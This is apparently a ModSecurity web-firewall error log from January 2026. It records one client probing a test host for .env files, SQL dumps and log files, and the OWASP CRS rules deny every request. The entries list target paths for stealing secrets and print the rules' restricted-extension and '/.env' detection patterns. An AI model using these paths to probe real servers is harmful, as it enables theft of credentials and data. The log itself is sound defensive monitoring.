[tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWd4ZkBaCnzgGdZXs4_g4gAAAAA"]
[Wed Jan 14 12:05:10.831376 2026] [:error] [pid 1400438] [client 35.180.113.122:45544] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWd4ZkBaCnzgGdZXs4_g4gAAAAA"]
[Wed Jan 14 12:05:10.831575 2026] [:error] [pid 1400438] [client 35.180.113.122:45544] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWd4ZkBaCnzgGdZXs4_g4gAAAAA"]
[Wed Jan 14 12:05:10.913835 2026] [:error] [pid 1401182] [client 35.180.113.122:45588] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWd4ZvL7maAL7YwXfyRGAAAAAAY"]
[Wed Jan 14 12:05:10.914186 2026] [:error] [pid 1401182] [client 35.180.113.122:45588] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWd4ZvL7maAL7YwXfyRGAAAAAAY"]
[Wed Jan 14 12:05:10.914370 2026] [:error] [pid 1401182] [client 35.180.113.122:45588] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWd4ZvL7maAL7YwXfyRGAAAAAAY"]
[Wed Jan 14 12:05:10.997605 2026] [:error] [pid 1400439] [client 35.180.113.122:45626] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWd4ZhZiJWN5ANZoWOd01AAAAAE"]
[Wed Jan 14 12:05:10.997941 2026] [:error] [pid 1400439] [client 35.180.113.122:45626] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWd4ZhZiJWN5ANZoWOd01AAAAAE"]
[Wed Jan 14 12:05:10.998120 2026] [:error] [pid 1400439] [client 35.180.113.122:45626] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWd4ZhZiJWN5ANZoWOd01AAAAAE"]
[Wed Jan 14 12:05:11.428782 2026] [:error] [pid 1400463] [client 35.180.113.122:45852] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWd4ZxBlpHg03ETPJhlXFwAAAAU"]
[Wed Jan 14 12:05:11.429105 2026] [:error] [pid 1400463] [client 35.180.113.122:45852] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWd4ZxBlpHg03ETPJhlXFwAAAAU"]
[Wed Jan 14 12:05:11.429271 2026] [:error] [pid 1400463] [client 35.180.113.122:45852] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWd4ZxBlpHg03ETPJhlXFwAAAAU"]
[Wed Jan 14 12:05:11.632492 2026] [:error] [pid 1400438] [client 35.180.113.122:45948] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWd4Z0BaCnzgGdZXs4_g4wAAAAA"]
[Wed Jan 14 12:05:11.632708 2026] [:error] [pid 1400438] [client 35.180.113.122:45948] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWd4Z0BaCnzgGdZXs4_g4wAAAAA"]
[Wed Jan 14 12:05:11.632864 2026] [:error] [pid 1400438] [client 35.180.113.122:45948] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWd4Z0BaCnzgGdZXs4_g4wAAAAA"]
[Wed Jan 14 12:05:11.714507 2026] [:error] [pid 1401182] [client 35.180.113.122:45988] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWd4Z_L7maAL7YwXfyRGAQAAAAY"]
[Wed Jan 14 12:05:11.714828 2026] [:error] [pid 1401182] [client 35.180.113.122:45988] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWd4Z_L7maAL7YwXfyRGAQAAAAY"]
[Wed Jan 14 12:05:11.714992 2026] [:error] [pid 1401182] [client 35.180.113.122:45988] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWd4Z_L7maAL7YwXfyRGAQAAAAY"]
[Wed Jan 14 12:05:11.809149 2026] [:error] [pid 1400439] [client 35.180.113.122:46030] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWd4ZxZiJWN5ANZoWOd01QAAAAE"]
[Wed Jan 14 12:05:11.809367 2026] [:error] [pid 1400439] [client 35.180.113.122:46030] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWd4ZxZiJWN5ANZoWOd01QAAAAE"]
[Wed Jan 14 12:05:11.809529 2026] [:error] [pid 1400439] [client 35.180.113.122:46030] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWd4ZxZiJWN5ANZoWOd01QAAAAE"]
[Wed Jan 14 12:05:12.153636 2026] [:error] [pid 1400441] [client 35.180.113.122:46210] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWd4aPDQTrRwdMNdhh-mwQAAAAM"]
[Wed Jan 14 12:05:12.153855 2026] [:error] [pid 1400441] [client 35.180.113.122:46210] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWd4aPDQTrRwdMNdhh-mwQAAAAM"]
[Wed Jan 14 12:05:12.154025 2026] [:error] [pid 1400441] [client 35.180.113.122:46210] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWd4aPDQTrRwdMNdhh-mwQAAAAM"]
[Wed Jan 14 12:05:12.324708 2026] [:error] [pid 1405561] [client 35.180.113.122:46320] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWd4aDszkuqYgM6kDsoCowAAAAc"]
[Wed Jan 14 12:05:12.324921 2026] [:error] [pid 1405561] [client 35.180.113.122:46320] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWd4aDszkuqYgM6kDsoCowAAAAc"]
[Wed Jan 14 12:05:12.325082 2026] [:error] [pid 1405561] [client 35.180.113.122:46320] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWd4aDszkuqYgM6kDsoCowAAAAc"]
[Wed Jan 14 12:05:12.410574 2026] [:error] [pid 1400438] [client 35.180.113.122:46360] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWd4aEBaCnzgGdZXs4_g5AAAAAA"]
[Wed Jan 14 12:05:12.410825 2026] [:error] [pid 1400438] [client 35.180.113.122:46360] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWd4aEBaCnzgGdZXs4_g5AAAAAA"]
[Wed Jan 14 12:05:12.410982 2026] [:error] [pid 1400438] [client 35.180.113.122:46360] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aWd4aEBaCnzgGdZXs4_g5AAAAAA"]
[Wed Jan 14 12:05:12.496305 2026] [:error] [pid 1401182] [client 35.180.113.122:46418] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWd4aPL7maAL7YwXfyRGAgAAAAY"]
[Wed Jan 14 12:05:12.496510 2026] [:error] [pid 1401182] [client 35.180.113.122:46418] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWd4aPL7maAL7YwXfyRGAgAAAAY"]
[Wed Jan 14 12:05:12.496693 2026] [:error] [pid 1401182] [client 35.180.113.122:46418] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aWd4aPL7maAL7YwXfyRGAgAAAAY"]
[Wed Jan 14 12:05:12.575203 2026] [:error] [pid 1400439] [client 35.180.113.122:46462] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWd4aBZiJWN5ANZoWOd01gAAAAE"]
[Wed Jan 14 12:05:12.575414 2026] [:error] [pid 1400439] [client 35.180.113.122:46462] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWd4aBZiJWN5ANZoWOd01gAAAAE"]
[Wed Jan 14 12:05:12.575567 2026] [:error] [pid 1400439] [client 35.180.113.122:46462] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aWd4aBZiJWN5ANZoWOd01gAAAAE"]
[Wed Jan 14 12:05:12.737978 2026] [:error] [pid 1400440] [client 35.180.113.122:46542] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWd4aOhQc121WA46NGcXxwAAAAI"]
[Wed Jan 14 12:05:12.738185 2026] [:error] [pid 1400440] [client 35.180.113.122:46542] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWd4aOhQc121WA46NGcXxwAAAAI"]
